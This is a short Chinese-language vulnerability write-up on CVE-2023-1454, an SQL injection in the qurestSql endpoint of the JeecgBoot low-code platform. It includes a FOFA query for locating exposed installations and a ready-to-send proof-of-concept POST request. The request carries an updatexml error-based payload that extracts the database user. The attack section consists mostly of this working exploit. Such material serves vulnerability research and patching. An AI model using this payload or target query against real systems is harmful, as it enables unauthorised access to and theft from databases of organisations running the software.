# JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞 CVE-2023-1454

## 漏洞描述

JeecgBoot 企业级低代码平台 qurestSql接口存在 SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库中的敏感数据，进一步攻击

## 漏洞影响

JeecgBoot 企业级低代码平台

## FOFA

```
app="JeecgBoot-企业级低代码平台"
```

## 漏洞复现

登陆页面

![image-20230504140737296](images/image-20230504140737296.png)

验证POC

```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Content-Type: application/json

{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
```

![image-20230504140757639](images/image-20230504140757639.png)